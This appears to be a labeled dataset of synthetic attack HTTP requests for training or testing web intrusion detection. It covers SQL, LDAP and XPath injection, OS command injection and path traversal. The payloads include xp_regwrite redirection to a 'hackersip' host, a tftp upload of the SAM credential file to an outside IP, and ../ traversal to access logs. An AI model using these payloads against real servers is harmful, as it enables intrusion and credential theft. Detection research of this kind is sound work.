class: LdapInjection
GET /it7_u1iIq_h8g/t4X/llielmaEmN9/at/rP9B-_u9dJv4f__KT5q.mspx?aritu=co80g&egtu=ft0adtd&it=421464&sxas=odeelm3ntmshhhEnc&e2div2q=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&Or@_5wkOg=ai&_cselectOvHIwdmu=33299&iea8t6mgaj=471344124&elIteea=steahu8iaChsn&KSVeA3C=loAlTnDuTD HTTP/1.1
Host: www.mvoetpC.gov
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: nbcs-s;q=0.8, eemu-udoet;q=0.0
Cache-Control: min-fresh=45
Client-ip: 194.117.51.43
Cookie: laec0s=51
Cookie2: $Version="057"
Date: Sat, 21 Nov 09 06:39:58 UTC
ETag: "czNQPVvyxU6hhOg3"
Expect: eesgne
From: soETt@snjTsesiy.ch
If-Modified-Since: Mon, 16 Aug 04 18:47:45 GMT
If-Unmodified-Since: Wed, 03 Nov 04 15:46:55 CET
If-Match: "UheVQ0s7cPPUNYaKK"
If-None-Match: *
If-Range: Thu, 25 Nov 04 14:47:14 GMT
Max-Forwards: 9843
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="eteseefo"
Authorization: Basic ZUFyYzpod2Q4b3loYw==
Range: -035
Referer: /ethne/eanlUeii.js
TE: deflate;q=0.0,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/2.0 (Windows; U; Windows NT 9.5; ae-nt; rv:6.4.1) Gecko/30882396
UA-CPU: x86
UA-Disp: 5765,446,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0874x8291
Via: FTP/9.2 www.eeesa.jpg, HTTP/2.8 www.pfocti.gif:687
Transfer-Encoding: identity
Upgrade: TrRiy/4.3, rsibt/9.4
Warning: 444 71.101.94.149:869 "e5eslcsyoIxfqbnaAe" 
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 9354462419781975
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37227
Start - Id: 41054
class: SqlInjection
GET /rex8rodOnsvSteieawu/6Du5CVtJHUtP/ec8wDp/rlapa1osesi/tdelohlErx/HzK@qrSAm/hCii0no8euica/cf51/sChJHXGDB4w@D/dbDuyBceiobos4eina/bnrcsthoho2/n32eajcdRe2ooe.tiff?tmaetebqecnes5e=mtN0xtermS%3Fitutso&Qner5=27412800&iasnRee6e=acceptembyu%5D%29a&8gMg=eisTfxrow5n&jeDP=rQ-o2xqjecTN&yteIh3r4qmxpu=adso&dnnssloba=%27%3B++++EXEC+++++master.dbo.sp_makewebtask+++++%27c%3A%5Cinetpub%5Cwwwroot%5Ceo.html%27%2C+++++%27SELECT+++++wa+++FROM+aemco+WHERE+++xtype%3D%27%27U%27%27%27 HTTP/1.1
Host: www.oacvofbi.cz
Connection: keep-alive
Accept: audio/x-wav;q=0.7, audio/*;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: deflate;q=0.9, identity;q=0.1, compress;q=0.7, gzip, gzip;q=0.9
Accept-Language: 9WtNs3-ann;q=0.5, u4eso-nO;q=0.5, mnstan-Ke, erjn-hq6n
Cache-Control: max-age=0252
Client-ip: 228.4.149.91
Cookie: Aconnectd9a=2oon;ldsirLsoz=andai
Cookie2: $Version="3"
Date: Fri, 24 Sep 04 10:40:51 GMT
ETag: W/"8ZFZf9yc-djNYPGhy8y"
Expect: anoat
From: 4a4Ax80@ieieio.ch
If-Modified-Since: Fri, 12 Feb 10 19:13:18 CET
If-Unmodified-Since: Tue, 18 Jan 05 09:04:54 UTC
If-Match: "5mqQPy@ILOQhO5Nzde"
If-None-Match: *
If-Range: Sat, 21 Apr 07 21:30:31 CET
Max-Forwards: 6
MIME-Version: 1.5
Pragma: a3OHhi5e='vslor'
Proxy-Authorization: NTLM c3RhdnNuaU9hMWF0VHRnczFzMTF0N29wZWl4d2NlTG5ubg==
Authorization: Basic eXVldFQ6YW1oZ2lhbA==
Range: 7-04,570-
Referer: /7isot.cgi
TE: gzip
User-Agent: nlq9-r http://www.nsrrbr.ch
UA-CPU: PowerPC
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 967x915
Via: 8.9 www.enenr.jpeg:86
Transfer-Encoding: identity
Upgrade: 8y7ca/4.0, ennao/2.4, eme/1.0
Warning: 428 www.ndOerieL.jpeg:9 "btsgnnnhoeooes5ArHa7" 
X-Forwarded-For: 57.95.233.202
X-Serial-Number: 54708069609443708
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41054
Start - Id: 38095
class: LdapInjection
GET /f53scY29NlgTon/Egguhohptlrhsh/XrB6uS7P5q.n_samT/t2omoueelss/WXjD/aczVlensv/61kilHAjlW2eeaZe/_rIRlocationnchildUO@/nSh@eEcTQE/eRu/s_PMdT0C/eehYiniifCufe.js?en0BIE=%29%28+++%7C+++%28displayName%3Dhad*%29+%28name%3Dhad*++%29%28++++mail%3Dhad*++++%29 HTTP/1.0
Host: 217.213.98.159
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: a-sBqr7a;q=0.1
Cache-Control: only-if-cached
Client-ip: 209.94.206.107
Cookie: 3yy8=- c
Cookie2: $Version="74"
Date: Tue, 26 Oct 04 15:22:25 CET
ETag: W/"ffkCjKJgxmCrLpG"
Expect: yzytf=wi36hMoe
From: oaitn@wnslnp.com
If-Modified-Since: Mon, 27 Aug 07 24:58:53 CET
If-Unmodified-Since: Sat, 03 Feb 07 07:20:13 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 27 Nov 09 03:06:26 CET
Max-Forwards: 8
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: atswre uFty=o9ssf
Authorization: Basic YWVBaXVFOnNsZWxyMw==
Range: 943633-,-798,-667
Referer: /onj1yhm/0zdusoht/5rdi/otLtae/Sggn.pdf
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/6.0 (Machintosh; U; PPC Mac OS X 2.8; ob-le; rv:4.8.3) Gecko/06500256
UA-CPU: 68000
UA-Disp: 119,1491,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3700x2595
Via: FTP/1.4 118.101.96.246, HTTP/7.9 www.fsDbt.png:5, 2.2 212.95.117.162
Transfer-Encoding: pcir
Upgrade: ttyt/8.2, cspny/5.6, dpX8/2.9
Warning: 525 www.tntaivc.png "taaisanteflseGtnsd" "Thu, 10 Jun 04 12:50:10 UTC"
X-Forwarded-For: 42.181.165.201
X-Serial-Number: 2885123328233620
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38095
Start - Id: 42732
class: SqlInjection
PUT /xJS/cps8adiotoerstt/oa/lbF.afMscSa2gTX_cZ/TEss/dCtcEbCH/auRoZZqABtnIbd5TL/tygtaLsm.html? HTTP/1.0
Content-Length: 100
Content-Language: iajw,Okeeaeax
Content-Encoding: identity
Content-Location: /fLhis/ntign8en.exe
Content-MD5: dzVpYWFlbGZzOEV5ZXRhMA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 02 Jun 05 05:45:43 GMT
Last-Modified: Thu, 10 Dec 09 15:52:40 CET
Host: www.xat3tW.fr
Connection: a9Egg
Accept: audio/*;q=0.4
Accept-Charset: utf-7, windows-1254;q=0.3, x-mac-korean;q=0.5, isiri-3342;q=0.3
Accept-Encoding: identity;q=0.3, deflate;q=0.9, deflate;q=0.7
Accept-Language: ;     exec  get_cust('x''    union    select object_name,object_type,''x'' from  user_objects where ''w3enunfas'' ='''   );
Cache-Control: only-if-cached
Client-ip: 58.18.176.200
Cookie: ye=nus;ts5aedjlteObt=2Ugk;Arhthegwtehh=fncee;iler2ilnEa=rntry@hy~binhthn1wgs;gJ1euXeH7iwinnt=<is3
Cookie2: $Version="50"
Date: Sat, 30 Jan 10 19:47:43 CET
ETag: W/"62cah2VmqVn6mv2p"
Expect: 100-continue
From: 6ueuo@oyblbl9dec.biz
If-Modified-Since: Tue, 17 Jun 08 02:43:34 CET
If-Unmodified-Since: Wed, 06 Jan 10 18:21:13 UTC
If-Match: "18xD6p2WGyDJSCPX"
If-None-Match: "CgHj.-oAvd03O.luiTT"
Max-Forwards: 6974
Pragma: acuNo=Fuad9
Proxy-Authorization: Digest nc=53EA578F
Authorization: Digest qop=eoqj
Range: 05899-13921,10727-12714,2996-
Referer: http://c7oinEl.de/Eree/ncET6/mCOa02nn/ousab.gif
TE: deflate;q=0.5,chunked;q=0.2,trailers
User-Agent: 1BtUGdGDx http://www.7ssNde.net
UA-OS: Win98
UA-Color: color32
Via: 3.2 www.rcfoa.html
Transfer-Encoding: deflate
Warning: 061 www.szapau.png "yf3tew" 
X-Forwarded-For: 61.170.12.182

or2Fbgtnxh=283638&ceenDOaoxnbonte=yTbUG2&gui5utdlm=9&i3bhono5sH=rwget1inputmocha&74servicesT8@=dmwQq

End - Id: 42732
Start - Id: 49642
class: XPathInjection
GET /yZZ5.jsp?paoz=weaCiz7hl9evvlso&gi4=857+++or++++l%2Fojsfdd%2F4eo%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D431%5D++++or+5%3D&roo=5o&Mj8.Jti=Ibnhe2I3&nadiooe=swfSf08zpshsd9mep&5o4toneetifmyn=e%24ranph-&e3dicsng6yeh=iW&ihs7e8FaZyAcmrt=tsyied5eEhttpspxRie%26bses&turn=eT&t-sock_streame54winntkUN=6714&t5dhNs1jspeo=edtqVur-. HTTP/1.1
Host: 217.230.120.246
Connection: keep-alive
Accept: image/*
Accept-Charset: big5, windows-1253
Accept-Language: e5pueet-8odlt, loyh-ftoraA;q=0.4, 2tn-sebiznt, dsa-trg4mtd, lo-S
Cache-Control: max-stale
Client-ip: 18.132.255.142
Cookie: 8FlI=217600;stik0h50ohonl=yooonMkdVa;tua=8
Date: Wed, 12 Jan 05 01:27:44 GMT
If-Modified-Since: Mon, 10 Jul 06 02:16:17 UTC
If-Unmodified-Since: Sun, 26 Sep 04 07:25:34 UTC
If-Match: "cjtUngQ0NX@WUNZ7IEO"
If-None-Match: "Rx8FF1UAXjy0sS-"
If-Range: Sun, 02 Dec 07 06:42:23 CET
Max-Forwards: 8
MIME-Version: 8.5
Pragma: toS=teenfHn
Authorization: Basic ZTZ0aDppZnVt
Referer: http://www.ehmletoc.de/2ioan6z/tyngn.tar.gz
TE: trailers,gzip;q=0.6
User-Agent: Mozilla/8.3 (Machintosh; U; PPC Mac OS X 2.6; sr-yd; rv:2.8.4) Gecko/93940909
Via: dvno/1.0 86.196.236.183:4835, 7.5 www.lFfj2wd.gif:95150, 1.7 www.xocUi.html
Transfer-Encoding: gzip
Upgrade: d5det/1.1
X-Forwarded-For: 163.247.165.107
X-Serial-Number: 460757969488
----: ----------------

null

End - Id: 49642
Start - Id: 48402
class: XPathInjection
GET /t4fVxL4wp-fni/CPAhredoeddyt/f3v0f7CC-fq7.Vx/uQvHb71LC6aITWgpn7/o9HtBnzjL/l9/32yv.js?57et7ifhwRe=101&eoMfElgd=bekeeo HTTP/1.1
Host: 207.215.112.197
Connection: ueetlnI
Accept: text/xml
Accept-Charset: iso-8859-8-i, x-mac-turkish, windows-1255, x-mac-icelandic;q=0.3, iso-2022-jp;q=0.7
Accept-Encoding: identity;q=0.0, compress, gzip, identity;q=0.1, identity
Accept-Language: daze-6U8tnzI;q=0.9, l-aE;q=0.2, 4ecsqsN-3p;q=0.6, ek6w-in, sot-n
Cache-Control: no-store
Client-ip: 211.40.238.240
Cookie: nrW=152     or    count(path/child::node()[position()=((i+j+k+l+1)]  |    path/child::*()[position()=(k+1)])=1 or  034=;S7=pr]ga@tuln9pimglpHdln;eLnucaseie=AR2sehkoatd;et4iHog=45;mhh=22;uTenEt7ejie=nettls
Cookie2: $Version="58"
Date: Thu, 01 Apr 04 19:58:03 UTC
ETag: W/"3JZKHMWjRGs1-oN_n7"
Expect: 100-continue
From: teanr@ghsi.com
If-Modified-Since: Mon, 11 Dec 06 14:28:37 CET
If-Unmodified-Since: Thu, 07 Aug 08 20:03:53 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 01 Feb 04 19:15:21 CET
Max-Forwards: 8
MIME-Version: 1.4
Pragma: ieC='nsxppO'
Proxy-Authorization: Basic c25yc3Npbjp0RWVlaA==
Authorization: Basic ZWNub2VyOnZza3Q=
Range: 32-
Referer: http://www.scOhWiyt.cz/jrznwe/ftid/taask/n58e7r/iGaza.tiff
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: etnibK/9.1.7.3
UA-CPU: Sparc
UA-Disp: 8567,358,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 141x150
Via: FTP/2.5 www.ti4b4r.tiff:7, FTP/8.1 123.217.233.116:32393, u6e/1.7 www.naStlee.png
Transfer-Encoding: gzip
Upgrade: gro1r/3.1, ienle/3.4, onHh/5.6, e5a/9.7, fIatk/7.7
Warning: 177 108.41.141.180:87 "gwo7es" 
X-Forwarded-For: 204.231.177.22
X-Serial-Number: 968415
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48402
Start - Id: 42994
class: OsCommanding
GET /oUDIXGv/yoeIl/nanmnrngeNwhnrhae/AY/2ID.sh?UCbnwCvbscriptKexp_3=echotlieasr&1CxpY=tmgu+ewigibvet HTTP/1.0
Host: 211.130.144.65
Connection: close
Accept: video/*
Accept-Charset: iso-8859-7, iso-8859-9;q=0.6, hz-gb-2312, x-mac-hebrew;q=0.8
Accept-Encoding: 
Accept-Language: *
Cookie: tnunaep=|   echo  "    Content-Type: text/html"    ; echo ""     ;    id    \0
Date: Thu, 07 Jun 07 09:36:40 CET
ETag: W/"lkxI8v6c_t10WsSB4p"
Expect: xaoamia
If-Unmodified-Since: Tue, 14 Sep 04 18:56:45 UTC
Max-Forwards: 204
Referer: http://iqta.com/nreele/wnaio9nl/eobb.rar
User-Agent: lMprn8io/9.7.5.0.0
UA-Disp: 651,9515,8
Via: FTP/7.0 www.rrhi.html:8243, 5pwtc/0.1 207.185.65.106:2139

null

End - Id: 42994
Start - Id: 41167
class: SqlInjection
PUT /m9W7rXye.shtml? HTTP/1.0
Content-Length: 187
Content-Language: tch,bpeag
Content-Encoding: compress
Content-MD5: d2pFc2VvZUVlY2xucGllZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 05 Mar 04 04:24:58 UTC
Last-Modified: Tue, 03 Apr 07 05:48:19 UTC
Host: 200.230.41.103:9286
Connection: close
Accept: application/*, application/rtf, text/plain;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: exec  xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','mo47ss','REG_SZ','DBMSSOCN,hackersip,80'
Cache-Control: no-store
Date: Sat, 12 Feb 05 23:43:20 CET
ETag: W/"fFkwsguA-iga.DK6B"
Expect: chpst=tokmo
If-Modified-Since: Sun, 08 Jul 07 20:37:11 CET
If-Unmodified-Since: Fri, 03 Dec 04 22:57:48 CET
If-None-Match: "cJh16rIdMB0Q6.HWIVbz"
Pragma: no-cache
Proxy-Authorization: NTLM YXRxd3VhdGN0MDBlZWhpcmppaGVhcGRsVHRhaHNhZUlvOWp0Zmk3
Authorization: mega tyneil=sEtmrM
Referer: http://tW3ate68.fr/f1io/nMo57/czuco/rsxtmr/ndNrj.jpg
TE: chunked,trailers
User-Agent: Mozilla/0.8 (Windows; U; Win98 7.5; 5s-as; rv:3.3.9) Gecko/30276831
Transfer-Encoding: gzip
X-Serial-Number: 06260247386

ZzB.ftmailEe=52852&7jWx=eecmT>pohtrzhe&6am4casI=52269&Gbetween2V=6264&ts=em1t9m&FacqFgNimgd9D=3slhubetweenlOxrm(w&auee2hCpgs=ddwa&32eahtgneaxdLw=42174&positionbinw_=2260057&tRlbhe=427

End - Id: 41167
Start - Id: 46069
class: PathTransversal
GET /_upftpkK@zD6i417D/lCbuEvd8MW9veDSFqq/Jtbin/ebcbtrotAa9nwc/iNiZ.ygKTQrTOs95g/extH3M9bf37p./Rlress8e/keO/an4R_vzT80af/0wh.html?0rldsnInRere=ttselectucra%2BraottUs&taisi9pu=cznt2utl HTTP/1.1
Host: 97.140.115.199
Connection: iptwtpst
Accept: application/x-tar;q=0.9, text/plain;q=0.1, application/*
Accept-Charset: cp-950;q=0.6, windows-1255;q=0.5, euc-jp;q=0.5, windows-874;q=0.0
Accept-Encoding: *
Accept-Language: gnkry-wec;q=0.5, qanreo-br, D-aoxaiw;q=0.1, LEoni0us-n6ebshl
Cookie: Astcnwehft=../../../../var/log/access_log%00.html;rLsah=68;HrKv2g=tsbkniLCy8g;8mhtm8vz=; 
Date: Wed, 28 May 08 09:57:01 CET
If-Modified-Since: Sat, 27 Feb 10 15:33:21 GMT
If-Unmodified-Since: Fri, 14 May 04 04:55:40 GMT
Max-Forwards: 145
Pragma: no-cache
Referer: /rausl.js
User-Agent: ivF3PGR0 http://www.aFnr.biz

null

End - Id: 46069
Start - Id: 36661
class: OsCommanding
GET /uNe.oi16701HO.S.php?N8edfemosUie=aaOexieS&hys=489406847&e3r6A=hsdqhetftrltisc4&tI5=2715&bs5Ie0uhev=h%3Dy%24s%3Athm&aortHIeamaa5tpm=%7C+++dir++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C+++++%2C&tt0g=42&IK2m=%2FHt%25qev%7E2%2Fe&AitbsD30So=eiNooaeeuRyr HTTP/1.1
Host: www.kmbse.biz
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Language: lss-ces, ati-toeefi, tyq2la-ce5t, n-rEuooge6;q=0.8
Client-ip: 63.137.108.57
Cookie: osyiEm1a=dei;9urjub9icyto=080;Dercarn9o2anr=18;po7iDeiraPrer=769
Expect: 100-continue
If-Match: "mSp1u1TZOIxz@CUlXCOC"
If-Range: Thu, 01 Apr 04 12:13:19 UTC
Pragma: no-cache
Referer: http://www.A7Hrgu8.gov/dlLauAl/fgrzl.php3
User-Agent: Mozilla/2.6 (compatible; Konqueror/7.3; Linux i586; ioaqWnzhl; seej0tglbo; iheyI)
----: ------------

null

End - Id: 36661
Start - Id: 44610
class: OsCommanding
GET /eU4vmXqqXEE8PR3/o458jMwRYyDz/eKYrWh81It27P6W_2/tH8BKfcr/hJTpkxaOzLrZMGXxy4ys/KsZHUnEO0avarG_/s1ykP@DguswYUH/dneq/lrt3r.cgi?window.openallVW-execn2execprocessing-instructionm=38.229.73.234%7C+++tftp+++++-i++116.26.17.207+++++PUT+sam._&SimgvV-pC=19&sDeerncoh6=287&eraekJp=ucnh9&ss=bjNtarhhusabtae HTTP/1.1
Host: www.tcxnsi0n.uk
Connection: hheeha0D
Accept: application/*;q=0.8, audio/*;q=0.5
Accept-Charset: *
Accept-Encoding: deflate, deflate;q=0.1, gzip;q=0.9
Accept-Language: ti37q-hraltWfd, rnttGn-yihh;q=0.0, e8tu-7gaslnG
Cache-Control: max-stale
Client-ip: 69.114.91.22
Cookie: ol3Nivro=3800090;p1eohe1Ihov=?@eoi;5wt=ws eoer>]ertmpnhaisi-p
Cookie2: $Version="11"
Date: Tue, 17 Oct 06 16:16:05 UTC
ETag: W/"s5g6qnsYgtokpr41lg"
Expect: 100-continue
From: 8sf9@dbeln5gatO.gov
If-Modified-Since: Sun, 17 Jun 07 11:25:25 GMT
If-Unmodified-Since: Thu, 05 Oct 06 12:29:28 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 76
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: ozleh5 vvuEC=0hotw
Authorization: Ntiork yesrssnr=smegluuc
Range: 41676-
Referer: /dtwf/pvncGbl/htrTx/enhyurd/otli94.mp3
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/8.0 (X11; U; SunOS sun4u 3.0; ae-ra; rv:6.4.6) Gecko/50563783
UA-Disp: 0488,6492,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 494x0584
Via: HTTP/5.3 188.64.121.58
Transfer-Encoding: gzip
Upgrade: oTe/6.3, en2/3.5, hq1ltn/9.0, 9elp1/2.1, Esotly/2.0
Warning: 294 www.eeugeo2c.png "bVo5d8oDShGrt1n" 
X-Forwarded-For: 84.212.52.145
X-Serial-Number: 92326230406152
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44610
Start - Id: 38128
class: LdapInjection
GET /eereKnmojasges024i/ocltscssn5gyuine9b.png?6OcunA=ytefmnnn+%3F&hsiert2nsm=irh&n1jZsi3=vyu7t%29%28%26%28objectClass+++%3D++++at4g*%29&twlzs4kn=8519&.UHxA1@-NWDY=lncibv3&re9e6tz=xf&5yrdee=bNSm HTTP/1.0
Host: 81.12.140.22
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: nhmcr-t7ui, e4to-t
Cache-Control: no-cache
Client-ip: 163.3.136.110
Cookie: reied8mritrp8xl=<selectnsriioEdiyhi mhaafrom
Cookie2: $Version="5"
Date: Sat, 19 Sep 09 16:28:58 GMT
ETag: W/"XSJy2BP.3@6hcqV.O8h6"
Expect: 100-continue
From: ttste@rra4euq0.de
If-Modified-Since: Thu, 28 Dec 06 13:26:15 UTC
If-Unmodified-Since: Sat, 02 Feb 08 18:09:18 UTC
If-Match: "O@KraQ34@7QxRmFDaSi"
If-None-Match: "Iu9KZp@Y5XLQxj876r8"
If-Range: Fri, 12 Oct 07 06:57:02 UTC
Max-Forwards: 9547
MIME-Version: 2.1
Pragma: ub8rreh=swt8a
Proxy-Authorization: ttA2f lstyphu=yxiY
Authorization: Digest algorithm=MD5-sess
Range: 17768-5
Referer: /laa5TeLi/dheG/edoocfcs/qasnioo/peiwipre.nsf
TE: chunked,chunked;q=0.3
Trailer: From
User-Agent: Mozilla/6.3 (Windows; U; Win 9x 9.1; nm-j6; rv:6.7.5) Gecko/07205514
UA-CPU: 68000
UA-Disp: 072,9161,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 9991x6291
Via: 2.6 www.9ztq3.jpg, FTP/2.2 www.strf6e7.jpeg
Transfer-Encoding: deflate
Upgrade: gsce/8.8, osc/5.9, loe/5.9, ect/1.6, 1xRehs/4.9
Warning: 380 www.gtcrerT.html:4591 "ksmndhegEt2od" "Sat, 04 Oct 08 01:21:24 GMT"
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38128
Start - Id: 43268
class: OsCommanding
GET /h1I-85sxBOh8oLhuyIm0.jpeg?-rEvZ=ik_-XQkkVKVe&PbkfvIk=d8lmndmkipAhhn26&a3NuBD5HcoG=%5C%3B%5C%2Fbin%5C%2Fid+++%3B&U2.K=54&eetw=2afehujhc5&DtoNsT4esp=e5f&4j2Eets=iegroup+byr&inKanp=2&ganme=3364&-y_UZsystemPt=t+sTi HTTP/1.0
Host: 27.111.221.188
Connection: close
Accept: application/*, audio/*;q=0.0, image/gif
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=70
Client-ip: 116.247.114.110
Cookie: eg=8i;meta7CA=i-HF;iOsystem7Vm=wntdo5&9e;emleygdrcnRt=67258735;lrt=wftphopens;guetaoasns7=uhsfni0ct
Cookie2: $Version="8"
Date: Tue, 25 Aug 09 13:40:29 CET
ETag: "PEioMFbnQm-_spjg_"
Expect: 9htstsrd
From: heEwPmnx@hafimu3.ch
If-Modified-Since: Sat, 19 Mar 05 22:05:30 GMT
If-Unmodified-Since: Sat, 12 Mar 05 19:13:53 CET
If-Match: "O_-kZz9GkW_-wJe"
If-None-Match: "kM.0C@TK9XLxfleixvg"
If-Range: *
Max-Forwards: 636
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest response="0B3cEb0aBbFc900Db7cC68fE50d55Ca6"
Authorization: Basic cDBmdWVIamg6ZHB6U2k=
Range: -640387
Referer: http://woOiu.com/eqoeR/ujdwaD/seiwSe/zlat.php4
TE: trailers,trailers,chunked;q=0.1
Trailer: If-Range
User-Agent: Mozilla/5.2 (compatible; ufpssq; Open BSD i586; atbIh)
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 842x6548
Via: FTP/6.5 www.eceeee.tiff, HTTP/7.8 www.dsset1ul.js:1690, tdt3/9.0 148.199.247.97
Transfer-Encoding: GEtztr; erelOo=e5VsE
Upgrade: lnphe/4.9
Warning: 800 46.120.121.199 "foFemwrttiu2" 
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 5980220981423198
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43268
Start - Id: 45284
class: PathTransversal
GET /hmatsr/eXq9KdqC1ni/RVNq2/8uJh/JrJGa/nRnoisesab1/aaeoa/e.HB8QgPA90USkO@PHd-/eidm3B.gif?yiiii=rePEg&ioctGieoaMr6ye=26523&oDTeclmkbve=ilan%5Dgil+Bbin&tt9T1lual3el=tr6e%40D%40MYky&niSesys1e6eoge=6808488379&i1ffnEg=5&Mssn93fhoir=eWdwl&ethnin09e5=uCwOVhe.DJKm&tntoeseIheh3=Roaetosd9uyppi&KCCyTOpldeleteX=tu+lres&7fNBGoboot.inif4j=me&EsubShn9easir=61&wctsa2te=287&Tit=3376398 HTTP/1.1
Host: www.oare.fr:53538
Connection: close
Accept: application/*;q=0.6
Accept-Charset: big5;q=0.1, euc-jp, euc-kr, windows-1257;q=0.3
Accept-Encoding: 
Accept-Language: mnieirm-ehclxrea, hn3nn-r1shl, a3ot-9;q=0.5, oeeaa7ba-ynhc;q=0.5, bA0estt-lyewcd
Cache-Control: max-stale=9249
Client-ip: 253.245.176.25
Cookie: ihptmg9nEsek=Atce;ssnlt=|;lrrP9uhRpt=81;I0dg=-oo;jEktfoseelsal=eto
Cookie2: $Version="4"
Date: Mon, 11 Feb 08 04:01:30 GMT
ETag: W/"5sS.bHdpvUqWsjVo-1h"
Expect: ruRriaR=bioddtes;bsfxiao=2oktcsxn
From: d4ks@aoejS8oe.be
If-Modified-Since: Thu, 01 Nov 07 17:36:03 UTC
If-Unmodified-Since: Fri, 30 Nov 07 23:57:54 CET
If-Match: "XEjffJGz31bk2n7Fs"
If-None-Match: "yw6.OSZM7TYq7My"
If-Range: *
Max-Forwards: 70
Pragma: no-cache
Proxy-Authorization: Basic ZnRxMWl3eGQ6c3FsbWdu
Authorization: Basic NjBycjJyOmhub2I=
Range: -3,07-8,-6
Referer: /ttrwomyd/fameoll8.asp
TE: trailers,gzip;q=0.8,chunked;q=0.7
Trailer: TE
User-Agent: ../../../../../../../../../usr/yo.bat
UA-OS: Win9x
UA-Pixels: 6726x359
Via: jr5/7.7 67.152.192.239, 7.6 www.6ttB.htm, FTP/8.3 235.1.202.39:64
Transfer-Encoding: gzip
Upgrade: sY7kva/6.7, wn5/7.5
Warning: 022 246.223.178.94:2891 "umhssfmiFhwrIlra" "Sat, 10 Sep 05 05:37:31 GMT"
X-Forwarded-For: 238.149.119.17
X-Serial-Number: 1947313
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45284
Start - Id: 38334
class: LdapInjection
GET /m2J-q-YhVosu-eOo/3af@/catsxGgroup byWUoB.jpg?uxs=rn7derpaeIioftazy&vheiAaiavrSu=19274&EWZ_cjbetween=znplb0aHwowy&enm8edroc4oynm7=189&m7zroi9Zbinfen=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.0
Host: www.edtsiqs.org
Connection: keep-alive
Accept: video/quicktime, application/x-tar;q=0.3, video/mpeg
Accept-Charset: *
Accept-Encoding: deflate, deflate, compress
Accept-Language: 1-tencE, khetlwm-he2Jei, 9erhT5-neiishpc;q=0.8, oos-nhboor;q=0.4, 4c-rswL;q=0.9
Cache-Control: max-age=0
Client-ip: 116.63.205.12
Cookie: unteeo2=yatdjevhhousrccrs@l;j0dwwix3zsock_stream-=oyrS;rSuN=31016;weaTiy=064233802
Cookie2: $Version="689"
Date: Tue, 28 Aug 07 05:58:09 UTC
ETag: "WbPrN@xJVi3tQ@DS"
Expect: 2aro
From: ha6o@adqussrlf.gov
If-Modified-Since: Fri, 09 Mar 07 07:26:50 CET
If-Unmodified-Since: Wed, 07 Jul 04 16:26:38 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 817
MIME-Version: 5.5
Pragma: ysenanRd='eo'
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: gehce tCstrgn=oEchtt
Range: 4549-1
Referer: /b7wR49ey/iestlan/r8eaiSo.shtml
TE: gzip;q=0.1
Trailer: Pragma
User-Agent: Mozilla/1.5 (Machintosh; U; Mac OS X 9.5; hv-4Y; rv:7.8.6) Gecko/87166613
UA-CPU: 68000
UA-Disp: 854,896,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 6454x625
Via: 1.7 142.56.230.228, atQ2/2.8 58.214.221.54, n3mnd/1.1 www.hekhs.css
Transfer-Encoding: vh7ku; iyiate=zlwamth
Upgrade: Ev8td4/8.8, eqerk/0.5, erNoe/4.2, ehp/2.5
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 3515531846
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38334
